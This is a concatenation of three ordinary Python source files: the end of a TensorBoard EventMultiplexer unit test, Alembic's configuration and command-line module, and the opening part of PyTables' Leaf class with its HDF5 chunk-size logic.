x = event_multiplexer.EventMultiplexer({'run1': 'path1', 'run2': 'path2'})
self.assertEqual(['path1/hp1', 'path1/hp2'], x.HealthPills('run1', 'Add'))
def testExceptions(self):
x = event_multiplexer.EventMultiplexer({'run1': 'path1', 'run2': 'path2'})
with self.assertRaises(KeyError):
x.Scalars('sv1', 'xxx')
def testInitialization(self):
x = event_multiplexer.EventMultiplexer()
self.assertEqual(x.Runs(), {})
x = event_multiplexer.EventMultiplexer({'run1': 'path1', 'run2': 'path2'})
self.assertItemsEqual(x.Runs(), ['run1', 'run2'])
self.assertEqual(x._GetAccumulator('run1')._path, 'path1')
self.assertEqual(x._GetAccumulator('run2')._path, 'path2')
def testAddRunsFromDirectory(self):
x = event_multiplexer.EventMultiplexer()
tmpdir = self.get_temp_dir()
join = os.path.join
fakedir = join(tmpdir, 'fake_accumulator_directory')
realdir = join(tmpdir, 'real_accumulator_directory')
self.assertEqual(x.Runs(), {})
x.AddRunsFromDirectory(fakedir)
self.assertEqual(x.Runs(), {}, 'loading fakedir had no effect')
_CreateCleanDirectory(realdir)
x.AddRunsFromDirectory(realdir)
self.assertEqual(x.Runs(), {}, 'loading empty directory had no effect')
path1 = join(realdir, 'path1')
gfile.MkDir(path1)
x.AddRunsFromDirectory(realdir)
self.assertEqual(x.Runs(), {}, 'creating empty subdirectory had no effect')
_AddEvents(path1)
x.AddRunsFromDirectory(realdir)
self.assertItemsEqual(x.Runs(), ['path1'], 'loaded run: path1')
loader1 = x._GetAccumulator('path1')
self.assertEqual(loader1._path, path1, 'has the correct path')
path2 = join(realdir, 'path2')
_AddEvents(path2)
x.AddRunsFromDirectory(realdir)
self.assertItemsEqual(x.Runs(), ['path1', 'path2'])
self.assertEqual(
x._GetAccumulator('path1'), loader1, 'loader1 not regenerated')
path2_2 = join(path2, 'path2')
_AddEvents(path2_2)
x.AddRunsFromDirectory(realdir)
self.assertItemsEqual(x.Runs(), ['path1', 'path2', 'path2/path2'])
self.assertEqual(
x._GetAccumulator('path2/path2')._path, path2_2, 'loader2 path correct')
def testAddRunsFromDirectoryThatContainsEvents(self):
x = event_multiplexer.EventMultiplexer()
tmpdir = self.get_temp_dir()
join = os.path.join
realdir = join(tmpdir, 'event_containing_directory')
_CreateCleanDirectory(realdir)
self.assertEqual(x.Runs(), {})
_AddEvents(realdir)
x.AddRunsFromDirectory(realdir)
self.assertItemsEqual(x.Runs(), ['.'])
subdir = join(realdir, 'subdir')
_AddEvents(subdir)
x.AddRunsFromDirectory(realdir)
self.assertItemsEqual(x.Runs(), ['.', 'subdir'])
def testAddRunsFromDirectoryWithRunNames(self):
x = event_multiplexer.EventMultiplexer()
tmpdir = self.get_temp_dir()
join = os.path.join
realdir = join(tmpdir, 'event_containing_directory')
_CreateCleanDirectory(realdir)
self.assertEqual(x.Runs(), {})
_AddEvents(realdir)
x.AddRunsFromDirectory(realdir, 'foo')
self.assertItemsEqual(x.Runs(), ['foo/.'])
subdir = join(realdir, 'subdir')
_AddEvents(subdir)
x.AddRunsFromDirectory(realdir, 'foo')
self.assertItemsEqual(x.Runs(), ['foo/.', 'foo/subdir'])
def testAddRunsFromDirectoryWalksTree(self):
x = event_multiplexer.EventMultiplexer()
tmpdir = self.get_temp_dir()
join = os.path.join
realdir = join(tmpdir, 'event_containing_directory')
_CreateCleanDirectory(realdir)
_AddEvents(realdir)
sub = join(realdir, 'subdirectory')
sub1 = join(sub, '1')
sub2 = join(sub, '2')
sub1_1 = join(sub1, '1')
_AddEvents(sub1)
_AddEvents(sub2)
_AddEvents(sub1_1)
x.AddRunsFromDirectory(realdir)
self.assertItemsEqual(x.Runs(), ['.', 'subdirectory/1', 'subdirectory/2',
'subdirectory/1/1'])
def testAddRunsFromDirectoryThrowsException(self):
x = event_multiplexer.EventMultiplexer()
tmpdir = self.get_temp_dir()
filepath = _AddEvents(tmpdir)
with self.assertRaises(ValueError):
x.AddRunsFromDirectory(filepath)
def testAddRun(self):
x = event_multiplexer.EventMultiplexer()
x.AddRun('run1_path', 'run1')
run1 = x._GetAccumulator('run1')
self.assertEqual(sorted(x.Runs().keys()), ['run1'])
self.assertEqual(run1._path, 'run1_path')
x.AddRun('run1_path', 'run1')
self.assertEqual(run1, x._GetAccumulator('run1'), 'loader not recreated')
x.AddRun('run2_path', 'run1')
new_run1 = x._GetAccumulator('run1')
self.assertEqual(new_run1._path, 'run2_path')
self.assertNotEqual(run1, new_run1)
x.AddRun('runName3')
self.assertItemsEqual(sorted(x.Runs().keys()), ['run1', 'runName3'])
self.assertEqual(x._GetAccumulator('runName3')._path, 'runName3')
def testAddRunMaintainsLoading(self):
x = event_multiplexer.EventMultiplexer()
x.Reload()
x.AddRun('run1')
x.AddRun('run2')
self.assertTrue(x._GetAccumulator('run1').reload_called)
self.assertTrue(x._GetAccumulator('run2').reload_called)
class EventMultiplexerWithRealAccumulatorTest(test_util.TensorFlowTestCase):
def testDeletingDirectoryRemovesRun(self):
x = event_multiplexer.EventMultiplexer()
tmpdir = self.get_temp_dir()
join = os.path.join
run1_dir = join(tmpdir, 'run1')
run2_dir = join(tmpdir, 'run2')
run3_dir = join(tmpdir, 'run3')
for dirname in [run1_dir, run2_dir, run3_dir]:
_AddEvents(dirname)
x.AddRun(run1_dir, 'run1')
x.AddRun(run2_dir, 'run2')
x.AddRun(run3_dir, 'run3')
x.Reload()
# Delete the directory, then reload.
shutil.rmtree(run2_dir)
x.Reload()
self.assertNotIn('run2', x.Runs().keys())
if __name__ == '__main__':
googletest.main()
|
from argparse import ArgumentParser
from configparser import ConfigParser
import inspect
import os
import sys
from . import __version__
from . import command
from . import util
from .util import compat
class Config:
r"""Represent an Alembic configuration.
Within an ``env.py`` script, this is available
via the :attr:`.EnvironmentContext.config` attribute,
which in turn is available at ``alembic.context``::
from alembic import context
some_param = context.config.get_main_option("my option")
When invoking Alembic programatically, a new
:class:`.Config` can be created by passing
the name of an .ini file to the constructor::
from alembic.config import Config
alembic_cfg = Config("/path/to/yourapp/alembic.ini")
With a :class:`.Config` object, you can then
run Alembic commands programmatically using the directives
in :mod:`alembic.command`.
The :class:`.Config` object can also be constructed without
a filename. Values can be set programmatically, and
new sections will be created as needed::
from alembic.config import Config
alembic_cfg = Config()
alembic_cfg.set_main_option("script_location", "myapp:migrations")
alembic_cfg.set_main_option("sqlalchemy.url", "postgresql://foo/bar")
alembic_cfg.set_section_option("mysection", "foo", "bar")
.. warning::
When using programmatic configuration, make sure the
``env.py`` file in use is compatible with the target configuration;
including that the call to Python ``logging.fileConfig()`` is
omitted if the programmatic configuration doesn't actually include
logging directives.
For passing non-string values to environments, such as connections and
engines, use the :attr:`.Config.attributes` dictionary::
with engine.begin() as connection:
alembic_cfg.attributes['connection'] = connection
command.upgrade(alembic_cfg, "head")
:param file\_: name of the .ini file to open.
:param ini_section: name of the main Alembic section within the
.ini file
:param output_buffer: optional file-like input buffer which
will be passed to the :class:`.MigrationContext` - used to redirect
the output of "offline generation" when using Alembic programmatically.
:param stdout: buffer where the "print" output of commands will be sent.
Defaults to ``sys.stdout``.
:param config_args: A dictionary of keys and values that will be used
for substitution in the alembic config file. The dictionary as given
is **copied** to a new one, stored locally as the attribute
``.config_args``. When the :attr:`.Config.file_config` attribute is
first invoked, the replacement variable ``here`` will be added to this
dictionary before the dictionary is passed to ``ConfigParser()``
to parse the .ini file.
:param attributes: optional dictionary of arbitrary Python keys/values,
which will be populated into the :attr:`.Config.attributes` dictionary.
.. seealso::
:ref:`connection_sharing`
"""
def __init__(
self,
file_=None,
ini_section="alembic",
output_buffer=None,
stdout=sys.stdout,
cmd_opts=None,
config_args=util.immutabledict(),
attributes=None,
):
"""Construct a new :class:`.Config`"""
self.config_file_name = file_
self.config_ini_section = ini_section
self.output_buffer = output_buffer
self.stdout = stdout
self.cmd_opts = cmd_opts
self.config_args = dict(config_args)
if attributes:
self.attributes.update(attributes)
cmd_opts = None
"""The command-line options passed to the ``alembic`` script.
Within an ``env.py`` script this can be accessed via the
:attr:`.EnvironmentContext.config` attribute.
.. seealso::
:meth:`.EnvironmentContext.get_x_argument`
"""
config_file_name = None
"""Filesystem path to the .ini file in use."""
config_ini_section = None
"""Name of the config file section to read basic configuration
from. Defaults to ``alembic``, that is the ``[alembic]`` section
of the .ini file. This value is modified using the ``-n/--name``
option to the Alembic runner.
"""
@util.memoized_property
def attributes(self):
"""A Python dictionary for storage of additional state.
This is a utility dictionary which can include not just strings but
engines, connections, schema objects, or anything else.
Use this to pass objects into an env.py script, such as passing
a :class:`sqlalchemy.engine.base.Connection` when calling
commands from :mod:`alembic.command` programmatically.
.. seealso::
:ref:`connection_sharing`
:paramref:`.Config.attributes`
"""
return {}
def print_stdout(self, text, *arg):
"""Render a message to standard out.
When :meth:`.Config.print_stdout` is called with additional args
those arguments will formatted against the provided text,
otherwise we simply output the provided text verbatim.
e.g.::
>>> config.print_stdout('Some text %s', 'arg')
Some Text arg
"""
if arg:
output = compat.text_type(text) % arg
else:
output = compat.text_type(text)
util.write_outstream(self.stdout, output, "\n")
@util.memoized_property
def file_config(self):
"""Return the underlying ``ConfigParser`` object.
Direct access to the .ini file is available here,
though the :meth:`.Config.get_section` and
:meth:`.Config.get_main_option`
methods provide a possibly simpler interface.
"""
if self.config_file_name:
here = os.path.abspath(os.path.dirname(self.config_file_name))
else:
here = ""
self.config_args["here"] = here
file_config = ConfigParser(self.config_args)
if self.config_file_name:
file_config.read([self.config_file_name])
else:
file_config.add_section(self.config_ini_section)
return file_config
def get_template_directory(self):
"""Return the directory where Alembic setup templates are found.
This method is used by the alembic ``init`` and ``list_templates``
commands.
"""
import alembic
package_dir = os.path.abspath(os.path.dirname(alembic.__file__))
return os.path.join(package_dir, "templates")
def get_section(self, name, default=None):
"""Return all the configuration options from a given .ini file section
as a dictionary.
"""
if not self.file_config.has_section(name):
return default
return dict(self.file_config.items(name))
def set_main_option(self, name, value):
"""Set an option programmatically within the 'main' section.
This overrides whatever was in the .ini file.
:param name: name of the value
:param value: the value. Note that this value is passed to
``ConfigParser.set``, which supports variable interpolation using
pyformat (e.g. ``%(some_value)s``). A raw percent sign not part of
an interpolation symbol must therefore be escaped, e.g. ``%%``.
The given value may refer to another value already in the file
using the interpolation format.
"""
self.set_section_option(self.config_ini_section, name, value)
def remove_main_option(self, name):
self.file_config.remove_option(self.config_ini_section, name)
def set_section_option(self, section, name, value):
"""Set an option programmatically within the given section.
The section is created if it doesn't exist already.
The value here will override whatever was in the .ini
file.
:param section: name of the section
:param name: name of the value
:param value: the value. Note that this value is passed to
``ConfigParser.set``, which supports variable interpolation using
pyformat (e.g. ``%(some_value)s``). A raw percent sign not part of
an interpolation symbol must therefore be escaped, e.g. ``%%``.
The given value may refer to another value already in the file
using the interpolation format.
"""
if not self.file_config.has_section(section):
self.file_config.add_section(section)
self.file_config.set(section, name, value)
def get_section_option(self, section, name, default=None):
"""Return an option from the given section of the .ini file."""
if not self.file_config.has_section(section):
raise util.CommandError(
"No config file %r found, or file has no "
"'[%s]' section" % (self.config_file_name, section)
)
if self.file_config.has_option(section, name):
return self.file_config.get(section, name)
else:
return default
def get_main_option(self, name, default=None):
"""Return an option from the 'main' section of the .ini file.
This defaults to being a key from the ``[alembic]``
section, unless the ``-n/--name`` flag were used to
indicate a different section.
"""
return self.get_section_option(self.config_ini_section, name, default)
class CommandLine:
def __init__(self, prog=None):
self._generate_args(prog)
def _generate_args(self, prog):
def add_options(fn, parser, positional, kwargs):
kwargs_opts = {
"template": (
"-t",
"--template",
dict(
default="generic",
type=str,
help="Setup template for use with 'init'",
),
),
"message": (
"-m",
"--message",
dict(
type=str, help="Message string to use with 'revision'"
),
),
"sql": (
"--sql",
dict(
action="store_true",
help="Don't emit SQL to database - dump to "
"standard output/file instead. See docs on "
"offline mode.",
),
),
"tag": (
"--tag",
dict(
type=str,
help="Arbitrary 'tag' name - can be used by "
"custom env.py scripts.",
),
),
"head": (
"--head",
dict(
type=str,
help="Specify head revision or <branchname>@head "
"to base new revision on.",
),
),
"splice": (
"--splice",
dict(
action="store_true",
help="Allow a non-head revision as the "
"'head' to splice onto",
),
),
"depends_on": (
"--depends-on",
dict(
action="append",
help="Specify one or more revision identifiers "
"which this revision should depend on.",
),
),
"rev_id": (
"--rev-id",
dict(
type=str,
help="Specify a hardcoded revision id instead of "
"generating one",
),
),
"version_path": (
"--version-path",
dict(
type=str,
help="Specify specific path from config for "
"version file",
),
),
"branch_label": (
"--branch-label",
dict(
type=str,
help="Specify a branch label to apply to the "
"new revision",
),
),
"verbose": (
"-v",
"--verbose",
dict(action="store_true", help="Use more verbose output"),
),
"resolve_dependencies": (
"--resolve-dependencies",
dict(
action="store_true",
help="Treat dependency versions as down revisions",
),
),
"autogenerate": (
"--autogenerate",
dict(
action="store_true",
help="Populate revision script with candidate "
"migration operations, based on comparison "
"of database to model.",
),
),
"rev_range": (
"-r",
"--rev-range",
dict(
action="store",
help="Specify a revision range; "
"format is [start]:[end]",
),
),
"indicate_current": (
"-i",
"--indicate-current",
dict(
action="store_true",
help="Indicate the current revision",
),
),
"purge": (
"--purge",
dict(
action="store_true",
help="Unconditionally erase the version table "
"before stamping",
),
),
"package": (
"--package",
dict(
action="store_true",
help="Write empty __init__.py files to the "
"environment and version locations",
),
),
}
positional_help = {
"directory": "location of scripts directory",
"revision": "revision identifier",
"revisions": "one or more revisions, or 'heads' for all heads",
}
for arg in kwargs:
if arg in kwargs_opts:
args = kwargs_opts[arg]
args, kw = args[0:-1], args[-1]
parser.add_argument(*args, **kw)
for arg in positional:
if (
arg == "revisions"
or fn in positional_translations
and positional_translations[fn][arg] == "revisions"
):
subparser.add_argument(
"revisions",
nargs="+",
help=positional_help.get("revisions"),
)
else:
subparser.add_argument(arg, help=positional_help.get(arg))
parser = ArgumentParser(prog=prog)
parser.add_argument(
"--version", action="version", version="%%(prog)s %s" % __version__
)
parser.add_argument(
"-c",
"--config",
type=str,
default=os.environ.get("ALEMBIC_CONFIG", "alembic.ini"),
help="Alternate config file; defaults to value of "
'ALEMBIC_CONFIG environment variable, or "alembic.ini"',
)
parser.add_argument(
"-n",
"--name",
type=str,
default="alembic",
help="Name of section in .ini file to " "use for Alembic config",
)
parser.add_argument(
"-x",
action="append",
help="Additional arguments consumed by "
"custom env.py scripts, e.g. -x "
"setting1=somesetting -x setting2=somesetting",
)
parser.add_argument(
"--raiseerr",
action="store_true",
help="Raise a full stack trace on error",
)
subparsers = parser.add_subparsers()
positional_translations = {command.stamp: {"revision": "revisions"}}
for fn in [getattr(command, n) for n in dir(command)]:
if (
inspect.isfunction(fn)
and fn.__name__[0] != "_"
and fn.__module__ == "alembic.command"
):
spec = compat.inspect_getargspec(fn)
if spec[3]:
positional = spec[0][1 : -len(spec[3])]
kwarg = spec[0][-len(spec[3]) :]
else:
positional = spec[0][1:]
kwarg = []
if fn in positional_translations:
positional = [
positional_translations[fn].get(name, name)
for name in positional
]
# parse first line(s) of helptext without a line break
help_ = fn.__doc__
if help_:
help_text = []
for line in help_.split("\n"):
if not line.strip():
break
else:
help_text.append(line.strip())
else:
help_text = ""
subparser = subparsers.add_parser(
fn.__name__, help=" ".join(help_text)
)
add_options(fn, subparser, positional, kwarg)
subparser.set_defaults(cmd=(fn, positional, kwarg))
self.parser = parser
def run_cmd(self, config, options):
fn, positional, kwarg = options.cmd
try:
fn(
config,
*[getattr(options, k, None) for k in positional],
**dict((k, getattr(options, k, None)) for k in kwarg)
)
except util.CommandError as e:
if options.raiseerr:
raise
else:
util.err(str(e))
def main(self, argv=None):
options = self.parser.parse_args(argv)
if not hasattr(options, "cmd"):
# see http://bugs.python.org/issue9253, argparse
# behavior changed incompatibly in py3.3
self.parser.error("too few arguments")
else:
cfg = Config(
file_=options.config,
ini_section=options.name,
cmd_opts=options,
)
self.run_cmd(cfg, options)
def main(argv=None, prog=None, **kwargs):
"""The console runner function for Alembic."""
CommandLine(prog=prog).main(argv=argv)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
########################################################################
#
# License: BSD
# Created: October 14, 2002
# Author: Francesc Alted - [email protected]
#
# $Id$
#
########################################################################
"""Here is defined the Leaf class."""
import warnings
import math
import numpy
from tables.flavor import (check_flavor, internal_flavor,
alias_map as flavor_alias_map)
from tables.node import Node
from tables.filters import Filters
from tables.utils import byteorders, lazyattr, SizeType
from tables.exceptions import PerformanceWarning
from tables import utilsExtension
def csformula(expectedsizeinMB):
"""Return the fitted chunksize for expectedsizeinMB."""
# For a basesize of 8 KB, this will return:
# 8 KB for datasets <= 1 MB
# 1 MB for datasets >= 10 TB
basesize = 8*1024 # 8 KB is a good minimum
return basesize * int(2**math.log10(expectedsizeinMB))
def limit_es(expectedsizeinMB):
"""Protection against creating too small or too large chunks."""
if expectedsizeinMB < 1: # < 1 MB
expectedsizeinMB = 1
elif expectedsizeinMB > 10**7: # > 10 TB
expectedsizeinMB = 10**7
return expectedsizeinMB
def calc_chunksize(expectedsizeinMB):
"""Compute the optimum HDF5 chunksize for I/O purposes.
Rational: HDF5 takes the data in bunches of chunksize length to
write the on disk. A BTree in memory is used to map structures on
disk. The more chunks that are allocated for a dataset the larger
the B-tree. Large B-trees take memory and causes file storage
overhead as well as more disk I/O and higher contention for the meta
data cache. You have to balance between memory and I/O overhead
(small B-trees) and time to access to data (big B-trees).
The tuning of the chunksize parameter affects the performance and
the memory consumed. This is based on my own experiments and, as
always, your mileage may vary.
"""
expectedsizeinMB = limit_es(expectedsizeinMB)
zone = int(math.log10(expectedsizeinMB))
expectedsizeinMB = 10**zone
chunksize = csformula(expectedsizeinMB)
return chunksize*8 # XXX: Multiply by 8 seems optimal for
# sequential access
class Leaf(Node):
"""Abstract base class for all PyTables leaves.
A leaf is a node (see the Node class in :class:`Node`) which hangs from a
group (see the Group class in :class:`Group`) but, unlike a group, it can
not have any further children below it (i.e. it is an end node).
This definition includes all nodes which contain actual data (datasets
handled by the Table - see :ref:`TableClassDescr`, Array -
see :ref:`ArrayClassDescr`, CArray - see :ref:`CArrayClassDescr`, EArray -
see :ref:`EArrayClassDescr`, and VLArray - see :ref:`VLArrayClassDescr`
classes) and unsupported nodes (the UnImplemented
class - :ref:`UnImplementedClassDescr`) these classes do in fact inherit
from Leaf.
.. rubric:: Leaf attributes
These instance variables are provided in addition to those in Node
(see :ref:`NodeClassDescr`):
.. attribute:: byteorder
The byte ordering of the leaf data *on disk*. It will be either
``little`` or ``big``.
.. attribute:: dtype
The NumPy dtype that most closely matches this leaf type.
.. attribute:: extdim
The index of the enlargeable dimension (-1 if none).
.. attribute:: nrows
The length of the main dimension of the leaf data.
.. attribute:: nrowsinbuf
The number of rows that fit in internal input buffers.
You can change this to fine-tune the speed or memory
requirements of your application.
.. attribute:: shape
The shape of data in the leaf.
"""
# Properties
# ~~~~~~~~~~
# Node property aliases
# `````````````````````
# These are a little hard to override, but so are properties.
attrs = Node._v_attrs
"""The associated AttributeSet instance - see :ref:`AttributeSetClassDescr`
(This is an easier-to-write alias of :attr:`Node._v_attrs`."""
title = Node._v_title
"""A description for this node
(This is an easier-to-write alias of :attr:`Node._v_title`)."""
# Read-only node property aliases
# ```````````````````````````````
name = property(
lambda self: self._v_name, None, None,
"""The name of this node in its parent group
(This is an easier-to-write alias of :attr:`Node._v_name`).""" )
chunkshape = property(
lambda self: self._v_chunkshape, None, None,
"""
The HDF5 chunk size for chunked leaves (a tuple).
This is read-only because you cannot change the chunk size of a
leaf once it has been created.
""" )
objectID = property(
lambda self: self._v_objectID, None, None,
"""A node identifier, which may change from run to run.
(This is an easier-to-write alias of :attr:`Node._v_objectID`)""")
ndim = property(
lambda self: len(self.shape), None, None,
"""The number of dimensions of the leaf data.
.. versionadded: 2.4""" )
# Lazy read-only attributes
# `````````````````````````
@lazyattr
def filters(self):
"""Filter properties for this leaf
See Also
--------
Filters
"""
return Filters._from_leaf(self)
# Other properties
# ````````````````
def _getmaindim(self):
if self.extdim < 0:
return 0 # choose the first dimension
return self.extdim
maindim = property(
_getmaindim, None, None,
"""The dimension along which iterators work.
Its value is 0 (i.e. the first dimension) when the dataset is not
extendable, and self.extdim (where available) for extendable ones.
""" )
def _setflavor(self, flavor):
self._v_file._checkWritable()
check_flavor(flavor)
self._v_attrs.FLAVOR = self._flavor = flavor # logs the change
def _delflavor(self):
del self._v_attrs.FLAVOR
self._flavor = internal_flavor
flavor = property(
lambda self: self._flavor, _setflavor, _delflavor,
"""The type of data object read from this leaf.
It can be any of 'numpy' or 'python'.
You can (and are encouraged to) use this property to get, set
and delete the FLAVOR HDF5 attribute of the leaf. When the leaf
has no such attribute, the default flavor is used..
""")
size_on_disk = property(lambda self: self._get_storage_size(), None, None,
"""
The size of this leaf's data in bytes as it is stored on disk. If the
data is compressed, this shows the compressed size. In the case of
uncompressed, chunked data, this may be slightly larger than the amount
of data, due to partially filled chunks.
""")
# Special methods
# ~~~~~~~~~~~~~~~
def __init__(self, parentNode, name,
new=False, filters=None,
byteorder=None, _log=True):
self._v_new = new
"""Is this the first time the node has been created?"""
self.nrowsinbuf = None
"""
The number of rows that fits in internal input buffers.
You can change this to fine-tune the speed or memory
requirements of your application.
"""
self._flavor = None
"""Private storage for the `flavor` property."""
if new:
# Get filter properties from parent group if not given.
if filters is None:
filters = parentNode._v_filters
self.__dict__['filters'] = filters # bypass the property
if byteorder not in (None, 'little', 'big'):
raise ValueError(
"the byteorder can only take 'little' or 'big' values "
"and you passed: %s" % byteorder)
self.byteorder = byteorder
"""The byte ordering of the leaf data *on disk*."""
# Existing filters need not be read since `filters`
# is a lazy property that automatically handles their loading.
super(Leaf, self).__init__(parentNode, name, _log)
def __len__(self):
"""Return the length of the main dimension of the leaf data.
Please note that this may raise an OverflowError on 32-bit platforms
for datasets having more than 2**31-1 rows. This is a limitation of
Python that you can work around by using the nrows or shape attributes.
"""
return self.nrows
def __str__(self):
"""
The string representation for this object is its pathname in
the HDF5 object tree plus some additional metainfo.
"""
# Get this class name
classname = self.__class__.__name__
# The title
title = self._v_title
# The filters
filters = ""
if self.filters.fletcher32:
filters += ", fletcher32"
if self.filters.complevel:
if self.filters.shuffle:
filters += ", shuffle"
filters += ", %s(%s)" % (self.filters.complib,
self.filters.complevel)
return "%s (%s%s%s) %r" % \
(self._v_pathname, classname, self.shape, filters, title)
# Private methods
# ~~~~~~~~~~~~~~~
def _g_postInitHook(self):
"""Code to be run after node creation and before creation logging.
This method gets or sets the flavor of the leaf.
"""
super(Leaf, self)._g_postInitHook()
if self._v_new: # set flavor of new node
if self._flavor is None:
self._flavor = internal_flavor
else: # flavor set at creation time, do not log
if self._v_file.params['PYTABLES_SYS_ATTRS']:
self._v_attrs._g__setattr('FLAVOR', self._flavor)
else: # get flavor of existing node (if any)
if self._v_file.params['PYTABLES_SYS_ATTRS']:
flavor = getattr(self._v_attrs, 'FLAVOR', internal_flavor)
self._flavor = flavor_alias_map.get(flavor, flavor)
else:
self._flavor = internal_flavor
def _calc_chunkshape(self, expectedrows, rowsize, itemsize):
"""Calculate the shape for the HDF5 chunk."""
# In case of a scalar shape, return the unit chunksize
if self.shape == ():
return (SizeType(1),)
# Compute the chunksize
MB = 1024 * 1024
expectedsizeinMB = (expectedrows * rowsize) // MB
chunksize = calc_chunksize(expectedsizeinMB)
maindim = self.maindim
# Compute the chunknitems
chunknitems = chunksize // itemsize
# Safeguard against itemsizes being extremely large
if chunknitems == 0:
chunknitems = 1
chunkshape = list(self.shape)
# Check whether trimming the main dimension is enough
chunkshape[maindim] = 1
newchunknitems = numpy.prod(chunkshape, dtype=SizeType)
if newchunknitems <= chunknitems:
chunkshape[maindim] = chunknitems // newchunknitems
else:
# No, so start trimming other dimensions as well
for j in xrange(len(chunkshape)):
# Check whether trimming this dimension is enough
chunkshape[j] = 1
newchunknitems = numpy.prod(chunkshape, dtype=SizeType)
if newchunknitems <= chunknitems:
chunkshape[j] = chunknitems // newchunknitems
break
else:
# Ops, we ran out of the loop without a break
# Set the last dimension to chunknitems
chunkshape[-1] = chunknitems
return tuple(SizeType(s) for s in chunkshape)
def _calc_nrowsinbuf(self):
"""Calculate the number of rows that fits on a PyTables buffer."""
params = self._v_file.params
# Compute the nrowsinbuf
rowsize = self.rowsize
buffersize = params['IO_BUFFER_SIZE']
nrowsinbuf = buffersize // rowsize
# Safeguard against row sizes being extremely large
if nrowsinbuf == 0:
nrowsinbuf = 1
# If rowsize is too large, issue a Performance warning
maxrowsize = params['BUFFER_TIMES'] * buffersize
if rowsize > maxrowsize:
warnings.warn("""\
The Leaf ``%s`` is exceeding the maximum recommended rowsize (%d bytes);
be ready to see PyTables asking for *lots* of memory and possibly slow
I/O. You may want to reduce the rowsize by trimming the value of
dimensions that are orthogonal (and preferably close) to the *main*
dimension of this leave. Alternatively, in case you have specified a
very small/large chunksize, you may want to increase/decrease it."""
% (self._v_pathname, maxrowsize),
PerformanceWarning)
return nrowsinbuf
# This method is appropriate for calls to __getitem__ methods
def _processRange(self, start, stop, step, dim=None, warn_negstep=True):
if dim is None:
nrows = self.nrows # self.shape[self.maindim]
else:
nrows = self.shape[dim]
if warn_negstep and step and step < 0 :
raise ValueError("slice step cannot be negative")
# (start, stop, step) = slice(start, stop, step).indices(nrows)
# The next function is a substitute for slice().indices in order to
# support full 64-bit integer for slices even in 32-bit machines.
# F. Alted 2005-05-08
(start, stop, step) = utilsExtension.getIndices(
start, stop, step, long(nrows) )
return (start, stop, step)
# This method is appropiate for calls to read() methods
def _processRangeRead(self, start, stop, step, warn_negstep=True):
nrows = self.nrows
if start is None and stop is None:
start = 0
stop = nrows
if start is not None and stop is None:
# Protection against start greater than available records
# nrows == 0 is a special case for empty objects
if nrows > 0 and start >= nrows:
raise IndexError( "start of range (%s) is greater than "
"number of rows (%s)" % (start, nrows) )
step = 1
if start == -1: # corner case
stop = nrows
else:
stop = start + 1
# Finally, get the correct values (over the main dimension)
start, stop, step = self._processRange(
start, stop, step, warn_negstep=warn_negstep)
return (start, stop, step)
def _g_copy(self, newParent, newName, recursive, _log=True, **kwargs):
# Compute default arguments.
start = kwargs.pop('start', None)
stop = kwargs.pop('stop', None)
step = kwargs.pop('step', None)
title = kwargs.pop('title', self._v_title)
filters = kwargs.pop('filters', self.filters)
chunkshape = kwargs.pop('chunkshape', self.chunkshape)
copyuserattrs = kwargs.pop('copyuserattrs', True)
stats = kwargs.pop('stats', None)
if chunkshape == 'keep':
chunkshape = self.chunkshape # Keep the original chunkshape
elif chunkshape == 'auto':
chunkshape = None # Will recompute chunkshape
# Fix arguments with explicit None values for backwards compatibility.
if title is None:
title = self._v_title
if filters is None: filters = self.filters
# Create a copy of the object.
(newNode, bytes) = self._g_copyWithStats(
newParent, newName, start, stop, step,
title, filters, chunkshape, _log, **kwargs)
# Copy user attributes if requested (or the flavor at least).
if copyuserattrs == True:
self._v_attrs._g_copy(newNode._v_attrs, copyClass=True)
elif 'FLAVOR' in self._v_attrs:
if self._v_file.params['PYTABLES_SYS_ATTRS']:
newNode._v_attrs._g__setattr('FLAVOR', self._flavor)
newNode._flavor = self._flavor # update cached value
# Update statistics if needed.
if stats is not None:
stats['leaves'] += 1
stats['bytes'] += bytes
return newNode
def _g_fix_byteorder_data(self, data, dbyteorder):
"Fix the byteorder of data passed in constructors."
dbyteorder = byteorders[dbyteorder]
# If self.byteorder has not been passed as an argument of
# the constructor, then set it to the same value of data.
if self.byteorder is None:
self.byteorder = dbyteorder
# Do an additional in-place byteswap of data if the in-memory
# byteorder doesn't match that of the on-disk. This is the only
# place that we have to do the conversion manually. In all the
# other cases, it will be HDF5 the responsible of doing the
# byteswap properly.
if dbyteorder in ['little', 'big']:
if dbyteorder != self.byteorder:
# if data is not writeable, do a copy first
if not data.flags.writeable:
data = data.copy()
data.byteswap(True)
else:
# Fix the byteorder again, no matter which byteorder have
# specified the user in the constructor.
self.byteorder = "irrelevant"
return data
def _pointSelection(self, key):
"""Perform a point-wise selection.
`key` can be any of the following items:
* A boolean array with the same shape than self. Those positions
with True values will signal the coordinates to be returned.
* A numpy array (or list or tuple) with the point coordinates.
This has to be a two-dimensional array of size len(self.shape)
by num_elements containing a list of of zero-based values
specifying the coordinates in the dataset of the selected
elements. The order of the element coordinates in the array
specifies the order in which the array elements are iterated
through when I/O is performed. Duplicate coordinate locations
are not checked for.
Return the coordinates array. If this is not possible, raise a
`TypeError` so that the next selection method can be tried out.
This is useful for whatever `Leaf` instance implementing a
point-wise selection.
"""
if type(key) in (list, tuple):
if isinstance(key, tuple) and len(key) > len(self.shape):
raise IndexError("Invalid index or slice: %r" % (key,))
# Try to convert key to a numpy array. If not possible,
# a TypeError will be issued (to be catched later on).
try:
key = numpy.array(key)
except ValueError:
raise TypeError("Invalid index or slice: %r" % (key,))
elif not isinstance(key, numpy.ndarray):
raise TypeError("Invalid index or slice: %r" % (key,))
# Protection against empty keys
if len(key) == 0:
return numpy.array([], dtype="i8")
if key.dtype.kind == 'b':
if not key.shape == self.shape:
raise IndexError(
"Boolean indexing array has incompatible shape")
# Get the True coordinates (64-bit indices!)
coords = numpy.asarray(key.nonzero(), dtype='i8')
coords = numpy.transpose(coords)
elif key.dtype.kind == 'i':
if len(key.shape) > 2:
raise IndexError(
"Coordinate indexing array has incompatible shape")
elif len(key.shape) == 2:
if key.shape[0] != len(self.shape):
raise IndexError(
"Coordinate indexing array has incompatible shape")
coords = numpy.asarray(key, dtype="i8")
coords = numpy.transpose(coords)
else:
# For 1-dimensional datasets
coords = numpy.asarray(key, dtype="i8")
else:
raise TypeError("Only integer coordinates allowed.")
# We absolutely need a contiguous array
if not coords.flags.contiguous:
coords = coords.copy()
return coords
# Public methods
# ~~~~~~~~~~~~~~
# Tree manipulation
# `````````````````
def remove(self):
"""Remove this node from the hierarchy.
